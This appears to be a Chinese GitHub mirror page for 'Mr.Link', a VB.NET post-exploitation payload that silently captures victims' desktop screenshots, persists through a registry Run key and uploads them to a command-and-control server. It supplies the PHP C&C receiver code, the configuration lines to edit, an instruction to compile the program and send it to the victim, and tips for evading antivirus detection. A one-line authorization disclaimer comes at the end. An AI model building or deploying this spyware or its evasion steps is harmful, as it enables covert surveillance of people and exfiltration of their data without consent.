项目作者: ProjectorBUg

项目描述 :
Silent Screenshot Capture | Post Exploitation Payload | VB.NET
高级语言: Visual Basic .NET
项目地址: git://github.com/ProjectorBUg/Mr.Link.git
创建时间: 2020-05-10T14:39:59Z
项目社区:https://github.com/ProjectorBUg/Mr.Link

开源协议:GNU General Public License v3.0

下载


forthebadge





Silent Screenshot Capture | Post Exploitation Payload | VB.NET



A simple payload to take the screenshot of victims desktop and upload it to the C&C.

Features:

  • Persistent (Using Registry Run Key)
  • Works in background
  • Less Code Less Bugs and Less Detection ;)
  • Deletes the screenshot from disk after upload it to C&C
  • C&C server in base64
  • Upload screenshots in organized way on C&C
  • No port forwarding needed! works with a single php file
  • [TODO] Machine Information
  • [TODO] Encryption
  • [TODO] Set interval remotely from C&C

Installation & Usage:

  • Clone this repository.
  • A webhosting i recommend namecheap
  • Goto your public_html folder and make new PHP file and put below code in it

    1. <?php
    2. $del = $_GET["dellog"];
    3. $folder = $_GET["folder"];
    4. mkdir($folder,0777);
    5. $file = $_GET["path"];
    6. if (!empty($_FILES["file"])){
    7. move_uploaded_file($_FILES["file"]["tmp_name"],
    8. $file . "/" . $_FILES["file"]["name"]);
    9. }
    10. unlink($del);
    11. ?>
    • Open the project in Visual Studio and the edit below variable in source code
      1. Dim server As String = BaseDecode1("your server address here in base64 encoded")
    • and edit this variable below as well
      1. Dim php As String = "yourphpfilename.php?" & "folder="
    • Just compile it and send it to the victim thats all !!

    Million Dollar Advice ;)

    To Avoid Antivirus Detection

    • Change the app icon
    • Generate new GUID
    • Changes all the variables
    • Obfuscate the code using Obfuscar
    • Change the Assembly information

    Donation:

    If this tool has been useful for you, feel free to thank me by buying me a coffee :)

N|Solid

Disclaimer:

This tool is supposed to be used only on authorized systems. Any unauthorized use of this tool without explicit permission is illegal.

License:

GNU GENERAL PUBLIC LICENSE